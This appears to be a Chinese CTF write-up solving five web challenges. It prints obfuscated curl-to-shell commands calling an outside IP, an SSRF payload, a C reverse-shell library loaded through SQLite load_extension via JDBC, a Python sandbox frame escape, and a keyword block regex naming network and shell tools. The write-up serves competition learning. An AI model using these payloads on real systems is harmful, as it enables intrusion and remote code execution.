simple_php
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
| <?php ini_set('open_basedir', '/var/www/html/'); error_reporting(0);
if(isset($_POST['cmd'])){ $cmd = escapeshellcmd($_POST['cmd']); if (!preg_match('/ls|dir|nl|nc|cat|tail|more|flag|sh|cut|awk|strings|od|curl|ping|\*|sort|ch|zip|mod|sl|find|sed|cp|mv|ty|grep|fd|df|sudo|more|cc|tac|less|head|\.|{|}|tar|zip|gcc|uniq|vi|vim|file|xxd|base64|date|bash|env|\?|wget|\'|\"|id|whoami/i', $cmd)) { system($cmd); } }
show_source(__FILE__); ?>
|
这个open_basedir是一点用没有的。最终payload可以利用eval
xxx配合`\`反斜杠去绕过关键字就可以 `cmd=eval `ec\ho Y3VybCBo\dHRwOi8vOC4xMzAuMjQuMTg4OjgwMDAvMS5zaHxzaA==|base\64 -d|s\h
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1716112779484-f715a06a-b023-43c6-b3b7-5b5f37c9176a.png#averageHue=%232c2e39&clientId=uc7aa35c2-bfa6-4&from=paste&height=836&id=u29cde1b3&originHeight=1672&originWidth=2632&originalType=binary&ratio=2&rotation=0&showTitle=false&size=279670&status=done&style=none&taskId=u664783d0-4ffb-4c7a-9777-6e3c036392f&title=&width=1316)
反弹shell过后发现没有flag文件,查看ps -ef
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1716112803066-5cf59c4f-4d94-4526-b709-c6b1eeca2f53.png#averageHue=%232d2f3a&clientId=uc7aa35c2-bfa6-4&errorMessage=unknown%20error&from=paste&height=836&id=u7fb1cb3a&originHeight=1672&originWidth=2632&originalType=binary&ratio=2&rotation=0&showTitle=false&size=546852&status=error&style=none&taskId=u44425b1a-41aa-4f3f-83fe-7474a24b20b&title=&width=1316)
发现存在mysql,上线cs平台后mysql -uroot -proot直接连进去读flag了
![image.png](https://cdn.nlark.com/yuque/0/2024/png/29650981/1716108068346-6ad5dcf2-28d6-4be5-8635-c30948655048.png#averageHue=%2330323a&clientId=u21684f9d-2324-4&from=paste&height=704&id=EiRhh&originHeight=1056&originWidth=1803&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=311401&status=done&style=none&taskId=u5c79f255-a26b-4400-8596-7618aa5424b&title=&width=1202)
easycms
dirsearch可以扫出flag.php,内容后面给了hint
1 2 3 4 5 6 7 8 9 10 11 12 13
| if($_SERVER["REMOTE_ADDR"] != "127.0.0.1"){
echo "Just input 'cmd' From 127.0.0.1";
return;
}else{
system($_GET['cmd']);
}
|
也就是说让我们找到一个ssrf的点位就行了。
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1716111579072-04af536a-c64d-407b-a0af-624143ac59b8.png#averageHue=%2325262a&clientId=uc7aa35c2-bfa6-4&from=paste&height=965&id=u91365f33&originHeight=1930&originWidth=3218&originalType=binary&ratio=2&rotation=0&showTitle=false&size=743970&status=done&style=none&taskId=u9ee26ecb-4952-4e06-ac4b-5e33abc6d9f&title=&width=1609)
源码审计发现down_img路由存在ssrf漏洞
但是我们要满足一个正则/(src)=([\"|']?)([^ \"'>]+)\\2/i"
,这个正则的含义其实也就是
标签的内容,example:<img src="http://xxx?cmd=whoami"/>
这个路由原本是用来识别img标签里的src位置的,但我们可控输入所以就造成了ssrf,最终poc
value=<img src="[http://127.0.0.1/flag.php?cmd=curl%24IFS%249http%3A%2F%2F8.130.24.188%3A8000%2F1.sh%7Csh"](http://127.0.0.1/flag.php?cmd=curl%24IFS%249http%3A%2F%2F8.130.24.188%3A8000%2F1.sh%7Csh") alt="Example Image">
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1716112211908-61b8b1a7-da2c-4baa-a618-cb9b48ac064d.png#averageHue=%23b1b1b1&clientId=uc7aa35c2-bfa6-4&from=paste&height=1041&id=u67773f13&originHeight=2082&originWidth=3528&originalType=binary&ratio=2&rotation=0&showTitle=false&size=388306&status=done&style=none&taskId=u7d26b620-6c4d-4335-96ee-f70eca43c2d&title=&width=1764)
发送请求后vps收到请求
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1716112233991-2cb69a97-a839-4a9d-ad3d-1a1f7dc0ed3b.png#averageHue=%232c2e39&clientId=uc7aa35c2-bfa6-4&from=paste&height=836&id=u809d9ff4&originHeight=1672&originWidth=2632&originalType=binary&ratio=2&rotation=0&showTitle=false&size=287165&status=done&style=none&taskId=u03f4e00c-acc1-46fe-a660-db328589439&title=&width=1316)
最终拿到flag
ezjava
考点是Java的Jdbc Attack对应的Sqlite部分。
虽然题目给了3个JDBC服务,但其实可以利用的只有sqlite,目的是rce。注意到开启了extension_enable选项
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1716108985265-0ff4a79e-364a-475c-939c-768d58cf28ba.png#averageHue=%23222326&clientId=uc7aa35c2-bfa6-4&from=paste&height=363&id=zRnHo&originHeight=726&originWidth=2140&originalType=binary&ratio=2&rotation=0&showTitle=false&size=186280&status=done&style=none&taskId=u2dc5f5f6-4e34-4e57-a41c-59101e73a2a&title=&width=1070)
开启了拓展支持,并且已经有了相关的攻击面文章
https://conference.hitb.org/files/hitbsecconf2021sin/materials/D1T2%20-%20Make%20JDBC%20Attacks%20Brilliant%20Again%20-%20Xu%20Yuanzhen%20&%20Chen%20Hongkun.pdf
在这个ppt里我们知道如何去加载远程的db文件。首先我们开启远程debug调试一下看看逻辑。
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1716110715893-885c0680-942d-4c2b-bc94-fc210a34fa74.png#averageHue=%23556e65&clientId=uc7aa35c2-bfa6-4&from=paste&height=826&id=z9RnT&originHeight=1652&originWidth=3444&originalType=binary&ratio=2&rotation=0&showTitle=false&size=674273&status=done&style=none&taskId=u64857429-ce82-44cd-86d5-50f6a074bd0&title=&width=1722)
这边会取resourceAddr的hashcode加上指定的前缀作为最终的缓存文件名。那么我们的思路就是利用这个特性缓存一个恶意的so文件,这是第一次请求。
恶意so文件制作过程如下
1 2 3 4 5 6 7 8 9 10 11 12
| #include <stdio.h> #include <unistd.h> #include <stdlib.h>
void flag() {{ system("bash -c 'bash -i >& /dev/tcp/8.130.24.188/7778 <&1'"); }}
void space() {{ static char waste[500 * 1024] = {{2}}; }}
|
gcc -shared -fPIC exp.c -o exp.so
最后我们使用load_extension(‘xxx’,’flag’)函数就会加载flag方法,成功的触发反弹shell了。
第二次请求我们就去加载这个恶意so文件。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33
| package com.javasec.pocs.solutions.ciscn; import java.io.File; import java.sql.Connection; import java.sql.DriverManager; import java.sql.PreparedStatement; import java.sql.Statement;
public class Gen { public static void main(String[] args) {
try { String dbFile = "poc.db"; File file = new File(dbFile); Class.forName("org.sqlite.JDBC"); Connection conn = DriverManager.getConnection("jdbc:sqlite:"+dbFile); System.out.println("Opened database successfully");
String sql = "CREATE VIEW security as SELECT ( SELECT load_extension('/tmp/sqlite-jdbc-tmp-1914716480.db','flag'));"; PreparedStatement preStmt = conn.prepareStatement(sql);
preStmt.executeUpdate(); preStmt.close(); conn.close();
} catch (Exception e) { e.printStackTrace(); }
} }
|
我们生成恶意db文件的脚本如上,可以看到我们创建了一个security表,然后用到了as SELECT语句。(security表用的是ppt里的,直接复制粘贴了)
然后我们发起请求就会触发select语句
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1716110930844-2d9caf1d-fab5-44f2-96a6-5738c5b77383.png#averageHue=%23232427&clientId=uc7aa35c2-bfa6-4&from=paste&height=256&id=UcmA2&originHeight=512&originWidth=1948&originalType=binary&ratio=2&rotation=0&showTitle=false&size=118260&status=done&style=none&taskId=ue8bddff1-053c-4dc8-a241-6a3e064477d&title=&width=974)
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1716110926524-d7586cb7-47c4-4a60-9ff5-9fd7e301dc4a.png#averageHue=%23212226&clientId=uc7aa35c2-bfa6-4&from=paste&height=558&id=kkYrM&originHeight=1116&originWidth=1848&originalType=binary&ratio=2&rotation=0&showTitle=false&size=177962&status=done&style=none&taskId=ua22bb6c4-5230-4f54-917d-fff4015ecc0&title=&width=924)
然后就开始实操。首先先让目标缓存一下我们的so文件
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1716111203456-52626a01-d2d7-4a32-9323-7db9f81f58c1.png#averageHue=%23282b3a&clientId=uc7aa35c2-bfa6-4&from=paste&height=823&id=Ebp6p&originHeight=1646&originWidth=2574&originalType=binary&ratio=2&rotation=0&showTitle=false&size=680340&status=done&style=none&taskId=u2eb403f0-a5d0-47a5-83a9-da902048e45&title=&width=1287)
然后我们再去加载恶意db,触发指定的sql语句。
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1716111242096-11de341f-e12e-44a0-91a0-488dfe842a88.png#averageHue=%232a2c3b&clientId=uc7aa35c2-bfa6-4&from=paste&height=800&id=aPkOQ&originHeight=1600&originWidth=2628&originalType=binary&ratio=2&rotation=0&showTitle=false&size=773480&status=done&style=none&taskId=u070fab08-d874-4f9b-a61a-74d49bef7bc&title=&width=1314)
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1716111250480-2d1ed89b-ca2d-4d6b-a21c-c3831c26dc0a.png#averageHue=%232c2e39&clientId=uc7aa35c2-bfa6-4&from=paste&height=836&id=sLFEn&originHeight=1672&originWidth=2632&originalType=binary&ratio=2&rotation=0&showTitle=false&size=286037&status=done&style=none&taskId=u6d4908b0-ab05-43e8-8330-08a5b1548ab&title=&width=1316)
最终获取flag
mossfern
yjail frame帧逃逸
https://xz.aliyun.com/t/13635?time__1311=mqmxnQ0QiQi%3DDteDsD7md0%3DdG%3Dd8bgh8wiD#toc-5
参考上述文章
1 2 3 4 5 6 7 8 9 10 11 12 13
| POST /api/run HTTP/1.1 Host: eci-2zeflmaf18usxi7ngaav.cloudeci1.ichunqiu.com Accept-Language: zh-CN,zh;q=0.9 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Content-Type: application/json Accept-Encoding: gzip, deflate Origin: http://eci-2zeflmaf18usxi7ngaav.cloudeci1.ichunqiu.com Referer: http://eci-2zeflmaf18usxi7ngaav.cloudeci1.ichunqiu.com/ Accept: application/json, text/plain, */* Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1713496688,1713681080,1715993802 Content-Length: 199
{"code":"def boogipop():\n def exp():\n yield pop.gi_frame.f_back.f_back.f_back\n pop = exp()\n for exp in pop:\n boo=exp\n return boo\nkino=boogipop()\nprint(kino)"}
|
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1716108779323-eb6efc91-f311-41a3-8b2c-e9012a933c19.png#averageHue=%23d9dfca&clientId=uc7aa35c2-bfa6-4&from=paste&height=909&id=urVbQ&originHeight=1818&originWidth=2972&originalType=binary&ratio=2&rotation=0&showTitle=false&size=743547&status=done&style=none&taskId=u6ba949b6-c518-4ee3-b79e-2cb601ca678&title=&width=1486)
可以看到已经获取到了f_code对象,根据文章中所说到的
f_code存在co_consts对象。
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1716108831657-295aa243-c34e-4693-aa70-16956fb12cca.png#averageHue=%23242528&clientId=uc7aa35c2-bfa6-4&from=paste&height=880&id=F6qjn&originHeight=1760&originWidth=3318&originalType=binary&ratio=2&rotation=0&showTitle=false&size=295830&status=done&style=none&taskId=u127d5339-c078-4418-8d19-b1cdd38d63f&title=&width=1659)
但是在本地测试的时候发现由于结果出现了flag字眼就会被拦截,这里其实很好绕过。
因为是全字符串检测,我们字符串截取部分自然就可以返回flag
1 2 3 4 5 6 7 8 9
| def boogipop(): def exp(): yield pop.gi_frame.f_back.f_back.f_back pop = exp() for exp in pop: boo=exp return boo kino=boogipop() print(kino.f_code.co_consts[19][1:])
|
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1716108877232-9f24eebd-c30f-4397-bb12-c40d1d6de201.png#averageHue=%23dfdfdf&clientId=uc7aa35c2-bfa6-4&from=paste&height=840&id=vvoFG&originHeight=1680&originWidth=2728&originalType=binary&ratio=2&rotation=0&showTitle=false&size=433681&status=done&style=none&taskId=u2f8b3324-a2e3-41eb-8bbe-984615839cf&title=&width=1364)
easycms_revenge
和第一天的都一样
value=<img src="[http://127.0.0.1/flag.php?cmd=curl%24IFS%249http%3A%2F%2F8.130.24.188%3A8000%2F1.sh%7Csh"](http://127.0.0.1/flag.php?cmd=curl%24IFS%249http%3A%2F%2F8.130.24.188%3A8000%2F1.sh%7Csh") alt="Example Image">
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1716112400543-d1f95c44-8c15-4c8c-b7d9-9d5eceef24b6.png#averageHue=%23d9cf95&clientId=uc7aa35c2-bfa6-4&from=paste&height=1041&id=ua30702d1&originHeight=2082&originWidth=3528&originalType=binary&ratio=2&rotation=0&showTitle=false&size=761634&status=done&style=none&taskId=uff0a57b7-1e65-471d-8976-b7474d992a2&title=&width=1764)
发送请求后vps收到请求
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1716112403326-09db90f9-0e7c-4391-91c4-81d1178df519.png#averageHue=%232c2e3a&clientId=uc7aa35c2-bfa6-4&from=paste&height=836&id=u2ce8c8c1&originHeight=1672&originWidth=2632&originalType=binary&ratio=2&rotation=0&showTitle=false&size=392413&status=done&style=none&taskId=u79378ee2-15bd-4634-a506-8fc32810fb5&title=&width=1316)
最终拿到flag